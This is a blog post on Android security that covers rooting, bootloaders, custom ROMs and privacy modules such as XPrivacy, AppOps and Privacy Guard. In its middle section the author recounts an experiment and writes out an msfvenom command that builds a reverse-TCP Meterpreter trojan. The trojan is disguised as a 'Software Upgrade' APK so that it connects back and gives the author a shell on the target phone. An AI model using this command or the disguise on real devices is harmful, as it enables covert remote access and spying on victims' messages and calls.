Introduction to Android
In this Topic, we are going to learn about Android and Open Source Security (OS). Android is an Open Source Platform. It is much like Linux, but still way too different from Linux. Linux is far too matured when compared to Android. So, this is Chetan Nayak, and welcome to my next blog on Open Source Web Security. I have written this blog assuming most of us would be using Android K, i.e. Kitkat or Android L i.e Lollipop.
The reason being Gingerbread and Jellybean had lots of open source security issues which I cannot discuss in this single blog. So, maybe I will discuss it next time when I dwell deeper into the older versions of Android. So, as of now, let’s stick with KitKat and Lollipop.
Android was designed with developers in mind. Security controls were designed to reduce the burden on developers. Security-savvy developers can easily work with and rely on flexible security controls. Developers less familiar with security will be protected by safe defaults.
I was not much into the android until the later quarter of 2013 when I had my first Android Cell Phone which was Sony Xperia L(based on 4.2.2 as of then). Heck, I even hated android the reason being it was extremely laggy especially Samsung devices. I even considered buying a Windows Lumia back then, but fortunately, I used to play a lot of games, and I had to buy Xperia L since this cell was Lag Proof. It had about 1 gig of RAM and Adreno 305. Cool enough to run anything.
After playing lots of games like NOVA3 and ModernCombat4, I got bored of that cell within a month. I knew that Android was based on Linux, and I wanted to do some of my modifications on that. I started reading about Customizations and learned about what was called as ‘Rooting’. Since I had a good backhand in Linux, rooting was not an issue with me. With a bit of help from XDA, I was able to successfully root my cell.
But then something struck me. As soon as my cell restarted after rooting, it just started boot-looping (stuck on boot screen forever). I didn’t even know what bootloader was in android. So, there was nothing I could do. It was just one month of me being bought my new cell and my cell was now soft-bricked. I always read rooting is dangerous, but I didn’t know it would brick my Cell. But I was wrong. As I kept on reading one and every other stuff on rooting, I came to know that rooting does not brick your phone.
Rooting is just similar to and Admin Access in a Computer (Actually it is a System Access, but I wrote Admin Access, so it is easy to understand for noobs.). This means rooting will never brick your phone. It was the bootloader which bricked my phone. For people who don’t know bootloader is; bootloader is similar to BIOS in windows. (If you don’t know what BIOS is, then you shouldn’t even read thinking about security in the first place.) Bootloader or Hboot(that’s what its called in android) s the first thing that runs when you boot up your Android device.
It packages the instructions to boot operating system kernel and most of them are specifically designed to run their own debugging or modification environment.
The Security CheckPoint of Android
Think of bootloader as the Security checkpoint of your device. If you break this checkpoint, then you are going to lose everything that you have on your phone. So, it is a good security feature I say. Because if you lose your phone, and someone tries to gain root access to bypass the lock (assuming you have locked your device with a pin or password.), then he will compulsorily have to unlock the bootloader, which will result in erasing your data on the phone.
So, you don’t have to worry about someone misusing it. So, similar is the case with custom ROMS. ROMs are operating systems based on Android versions specifically designed for your hardware architecture. So, if you check on XDA, for your phone, you will have n number of customized ROMs for your phones, some of the most famous being Cyanogen Mod ROMs, which are already pre-rooted and come with a pre-defined set of customizations.
The Security OverRide of Android
You may be thinking as of now, that you have a secure cell phone. But I am here to prove you wrong again and that is the whole point of this blog. By the second quarter of 2014, people had already started developing exploits and rootkits for Android, which could root your cell phones without even unlocking the bootloaders.
Not scary enough? Let me tell you the most dangerous part. They could even install Trojans inside that. So, even if the cops could trace the cell and you even get your cell back, there is still a high risk that they could see everything that you do on your phone. This is something that I have tried as an experiment in an actual practical environment.
I used Metasploit for this attack. What I did was I created a Trojan and installed it in the target phone. It was a simple apk file, and I named it a Software Upgrade. So, if the user is just a common man with only bit and byte of info about Security, then he won’t even dare to remove it. And I made sure, that whenever the internet is activated, the malware I created would automatically execute itself and connect back to my remote port on the host machine.
Following commands were used for the attack (Metasploit is a penetration testing software which helps in checking vulnerabilities on a platform or specific devices.)
My Host IP Address: 192.168.xx.xx
My Host port (to connect back to): 445
>>>msfvenom android/meterpreter/reverse_tcp LHOST=192.168.xx.xx LPORT=445 > SoftwareUpgrade.apk
So, here I created a reverse TCP channel on my computer. So, every time the internet starts on the android, I will get a shell opened on my Kali machine or the machine where I have installed Metasploit.
So, now you know how scary it is for a person whom you don’t even know, has records of every transaction you do through your Cell, every other contact, WhatsApp messages, SMS, Viber, and Skype calls log and everything. If that isn’t scary, then I don’t know what is.
Enough about Security issues. We all know that every other platform has security issues. How could we be secure then? This is not exactly true. Platforms can be made secure upto a specific point, but after that, it’s upto us to make sure it stays that way. There is an infamous quote in the world of Security:
“Social Engineering: Because there is no patch for Human Stupidity”
I heard this phrase a long time ago when I was watching a Conference of DefCon.
When there is no technical vulnerability to exploit, you should try to hack humans. And, by that, I don’t mean hypnotism and stuff. I mean Social Engineering. You can read my other blog “Importance of Cyber Security in our day-to-day life” for more info about this.
Core Security Function of Android
Besides, social engineering, which is something which can only be taken care of if you are smart; there are ways as to how you can develop android applications in a secure way to make sure it stays that way.
So here are some of the core security features that help you build secure apps:
- The Android Application Sandbox, which isolates your app data and code execution from other apps.
- An application framework with robust implementations of common security functionality such as cryptography, permissions, and secure IPC.
- An encrypted filesystem that can be enabled to protect data on lost or stolen devices.
- User-granted permissions to restrict access to system features and user data.
- Application-defined permissions to control application data on a per-app basis.
What can you do if you want a Secure Environment but you are not a developer?
As of Android 5 i.e. Lollipop, it provides a feature where the user can add multiple profiles and restricted modes to use phones and tablets. Besides, if you have rooted your phone, there are android apps in Xposed modules such as AppOps, Xprivacy or Privacy Guard which can help you take care of almost everything. You need to install the Xposed Framework for that.
Xposed Framework is what allows Xposed modules to work. Xposed modules allow you to change the behavior of Apk files and System files without the need of installing a different ROM. Its also easy to undo the changes, so there is little at risk here and it isn’t even time-consuming since there is no need to flash multiple ROMS, kernels, and their bug fixes.
Xprivacy, Privacy Guard and AppOps are modules of exposed which allow you to make your android secure by choosing which app should have access to what such as the internet, keyboard, sdcard, root access and lots of other stuff. You can even disable access to only specific services and create user-defined templates for that. As for me, I prefer to choose Xprivacy. But here are some info or differences if you beg to differ to choose between the above three.
This was originally introduced by Google in Android 4.3. (This is the main reason I do not support it. I do not trust Google. Call it Paranoia, but google traces everything you do. And I don’t need someone to keep a track of everything I do, but if you trust Google, go for it.). The main limitation of AppOps is that Google only lets you block access to those apps which it wants you to block.
That meaning if you want to block apps related to Google, such as Play Services(which actually consumes more than 50% of your normal memory, battery, and data(internet)) you won’t be able to. This is one more reason for me to hate Google. So, I believe that AppOps is nothing but a malware for me. (but that’s just me thinking that way, it’s not if you trust Google sole heartedly)
Privacy Guard is a simple to use interface made in replacement for AppOps by Cyanogen Mod. If you are a beginner, then I suggest you use this, since it has only a toggle on-off button and self-defined templates as to which kind of app should have access to what. This isn’t that secure if there is a malware which acts or impersonates like a system app. But it is good to get you started.
Xprivacy is an All in one tool. But it is aimed for Experts. You can compare it with a Swiss Army Knife. It has everything in it and can make your phone secure in every other way, but if you don’t know what you are doing, it will only mess up your phone and stop apps from even from starting. You can also restrict access to System Apps. This one is what I personally prefer to choose.
Besides the above modules, there are even other modules such as Lightening Firewall or BootManager in Xposed, which can help to restrict access to the internet for specific apps and stop apps from booting alongside system when restarting a phone.
So, that would be it for this blog. In case of security concerns, you can surely visit or be a member of the XDA website which can grant you much more info on privacy.
This has been a guide to Android. Here we discussed the Basic Concept, Security checkpoints and Core Security Function of Android. You can also go through our other suggested articles to learn more –